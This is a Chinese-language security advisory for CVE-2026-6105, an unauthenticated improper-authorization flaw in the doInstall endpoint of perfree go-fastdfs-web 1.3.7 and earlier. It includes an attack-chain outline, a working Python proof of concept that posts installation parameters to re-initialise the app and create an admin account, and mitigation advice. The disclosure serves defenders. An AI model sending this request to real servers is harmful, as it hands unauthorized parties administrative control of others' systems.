CVE-2026-6105 CVSS 7.3 高危

CVE-2026-6105 perfree go-fastdfs-web权限不当漏洞

披露日期: 2026-04-11

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-6105

漏洞类型

权限不当

CVSS评分

7.3 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

perfree go-fastdfs-web

漏洞概述

perfree go-fastdfs-web在1.3.7及之前的版本中存在安全漏洞。该漏洞源于doInstall接口的InstallController.java文件中存在权限不当问题。攻击者可利用该漏洞在无需身份验证的情况下远程发起攻击，可能导致系统机密性、完整性和可用性受到低程度影响。目前厂商尚未对此漏洞做出回应。

技术细节

该漏洞位于perfree go-fastdfs-web项目的src/main/java/com/perfree/controller/InstallController.java文件中，具体涉及doInstall接口的实现逻辑。漏洞成因是由于开发人员在编写该接口时，未能对访问来源进行必要的身份认证和权限校验，导致该接口暴露在公网中且可以被匿名访问。通常情况下，系统安装接口仅在初始化阶段开放，且具备严格的访问控制。然而，由于该权限不当缺陷，未经身份验证的远程攻击者可以通过构造恶意的HTTP请求直接调用该接口。利用此漏洞，攻击者可能绕过安全检查，重新初始化系统配置，甚至创建高权限账户，从而对系统的机密性、完整性和可用性造成威胁。

攻击链分析

STEP 1

1. 信息收集

攻击者使用扫描工具或手动探测，确认目标服务器运行的是perfree go-fastdfs-web，且版本在1.3.7及以下。

STEP 2

2. 漏洞利用

攻击者构造针对/install/doInstall接口的HTTP POST请求，包含恶意的安装配置参数，直接发送给目标服务器。

STEP 3

3. 权限获取

由于缺乏身份验证，目标服务器执行安装逻辑，攻击者借此篡改系统配置或创建具有管理员权限的账户，从而控制应用。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

def exploit(target_url):
    """
    PoC for CVE-2026-6105
    Exploits improper authorization in the doInstall interface.
    """
    url = f"{target_url}/install/doInstall"
    # Payload to simulate a恶意 installation request
    data = {
        "dbHost": "127.0.0.1",
        "dbPort": "3306",
        "dbName": "fastdfs",
        "dbUser": "root",
        "dbPass": "root",
        "userName": "admin",
        "userPass": "admin123"
    }
    
    try:
        response = requests.post(url, data=data, timeout=10)
        if response.status_code == 200:
            print("[+] Target may be vulnerable. Installation process triggered.")
            print(f"[+] Response: {response.text[:100]}")
        else:
            print("[-] Exploit failed or target not vulnerable.")
    except Exception as e:
        print(f"[!] Error: {e}")

if __name__ == "__main__":
    target = "http://127.0.0.1:8080"
    exploit(target)

影响范围

perfree go-fastdfs-web <= 1.3.7

防御指南

临时缓解措施

建议立即在网络边界阻断对/install/doInstall接口的访问，或在应用代码层面为该接口增加强身份认证机制，防止未授权访问。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-6105
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-6105
3 Details https://www.cvedetails.com/cve/CVE-2026-6105/
4 VulDB https://vuldb.com/cve/CVE-2026-6105
5 Link https://gitee.com/ying-xiujie/cve/issues/IGB6M9
6 Link https://vuldb.com/submit/781598
7 Link https://vuldb.com/vuln/356964
8 Link https://vuldb.com/vuln/356964/cti

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表